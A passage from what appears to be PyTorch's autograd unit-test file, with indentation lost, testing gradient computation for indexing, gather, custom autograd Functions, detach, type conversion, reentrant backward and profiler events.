self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
# TODO: opinfo this or move to unbind's test suite
def test_unbind(self):
stacked = torch.randn(3, 10, 10, requires_grad=True)
x, y, z = stacked.unbind()
grad = torch.randn(3, 10, 10)
torch.autograd.backward([x, y, z], grad.unbind())
self.assertEqual(stacked.grad, grad)
# check that it works with only one gradient provided (#9977)
for i in range(3):
stacked = torch.randn(3, 10, 10, requires_grad=True)
outs = stacked.unbind()
gi = grad.unbind()[i]
g, = torch.autograd.grad(outs[i], stacked, gi)
g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
for j in range(3)], dim=0)
self.assertEqual(g, g_expected)
# TODO: opinfo this or move to fill's test suite
def test_fill(self):
root = torch.randn(4, 5, requires_grad=True)
def func(root):
x = root.clone()
x.fill_(2)
return x
gradcheck(func, [root])
gradgradcheck(func, [root])
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
class Id(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad_x):
return grad_x
with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
f = Id()
# # After raising warning, should still return an instance
self.assertIsInstance(f, Id)
x = torch.zeros(1, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
f(x)
t = Id.apply(x)
self.assertEqual(t.grad_fn.name(), "IdBackward")
# THPFunction is the base class of both grad_fn and autograd functions,
# which means that a lot of accessors on them may segfault. Test that we
# properly error in this case.
t = torch.ones(1, requires_grad=True)
t._backward_hooks = dict()
with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
f._register_hook_dict(t)
with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
f.register_hook(lambda x, y: None)
with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
f.next_functions
with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
f.name()
with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point in time, it complains that the graph has been freed
# (which indeed true, although a somewhat indirect way of stating the
# problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
# anything that interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# This test failed complaining that buffers had already been freed
# prior to #22983. Also pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
# in-place deatch on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t, ):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
q, p = Inplace.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
# This tests checks backward engine for a very subtle bug that appreared
# in one of the initial versions of autograd. Gradients tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
# so the gradients needed to be summed. Engine used to keep a need_copy
# set of tensors that will need a clone upon next addition and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from need_copy set.
# 2. When accumulating in second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in 3rd place)
# 3. When accumulating in the third place, it wasn't in the need_copy set
# as well, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions, except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
# TODO: Create OpInfos for these ops
def test_broadcast_tensors(self):
f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True),
torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True),
torch.randn(1, 1, dtype=torch.double, requires_grad=True),
torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_broadcast_tensors", "broadcast",
lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
True, f_args_variable, f_args_tensor)
def test_block_diag(self):
f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_block_diag", "block_diag",
lambda a, b, c: torch.block_diag(a, b, c),
True, f_args_variable, f_args_tensor)
def test_cat_empty_legacy(self):
f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
# gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere,
# hence False passed below, but gradcheck checked explicitly.
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty_legacy", "cat",
lambda a, b: torch.cat((a, b)),
False, f_args_variable, f_args_tensor, check_forward_ad=True)
self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION))
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertEqual(r1, r2, rtol=0.01, atol=0.0)
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertEqual(input1.grad, input2.grad, rtol=0.01, atol=0.0)
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause a non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
# to compute the numerical gradient which can also cause the signs to flip.
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
return D, U
# TODO: review if this can be ported to OpInfos or moved to test_linalg.py
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = A.matmul(A.transpose(-1, -2)) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in the lobpcg's forward.
# Note it is not required if symeig is in forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.transpose(-1, -2))
# the tests below take about 1-2 minutes to finish,
# but we want to be extra sure that the backward is correct.
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
def test_maximum_and_minimum_subgradient(self):
def run_test(f, a, b, expected_a_grad, expected_b_grad):
a = torch.tensor(a, requires_grad=True)
b = torch.tensor(b, requires_grad=True)
z = f(a, b)
z.sum().backward()
self.assertEqual(a.grad, expected_a_grad)
self.assertEqual(b.grad, expected_b_grad)
run_test(torch.maximum, [0., 1., 2.], [1., 1., 1.], [0., 0.5, 1.], [1., 0.5, 0.])
run_test(torch.minimum, [0., 1., 2.], [1., 1., 1.], [1., 0.5, 0.], [0., 0.5, 1.])
# TODO: norm is deprecated, update these tests and port them to OpInfos
# or test_linalg.py
def test_norm_subgradient(self):
def run_test(input_size, norm_deg):
input = torch.zeros(*input_size, requires_grad=True)
input.norm(norm_deg).backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), 2)
run_test((10, 10), 2)
run_test((10,), 3)
run_test((10,), 1)
run_test((10,), 1.5)
run_test((10,), inf)
def test_norm_inf_subgradient(self):
def run_test(input, expected, dim=None):
x = torch.tensor(input, requires_grad=True)
out = x.norm(inf, dim=dim, keepdim=True)
out.backward(torch.ones(out.size()))
self.assertEqual(x.grad, expected)
run_test([0., 0., 0.], [0., 0., 0.])
run_test([1., 0., 1.], [0.5, 0., 0.5])
run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_pow_scalar_base(self):
a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
# The derivative of sinc(x) at x=0 has to be special cased.
# A naive computation will result in 0/0 -> NaN.
# We also need to be careful when we are very close to 0, as the
# derivative's denominator is squared, and there are some floats
# that are positive and whose squares are zero.
a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
dtype=torch.double,
requires_grad=True)
gradcheck(torch.sinc, a)
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEquals(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add, aten::sum to have the sequence numbers,
# expecting the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
# Ignore record_function user scope.
if "autograd::engine::evaluate_function" in e.name:
continue
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that profiler will be able
# propagate across fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
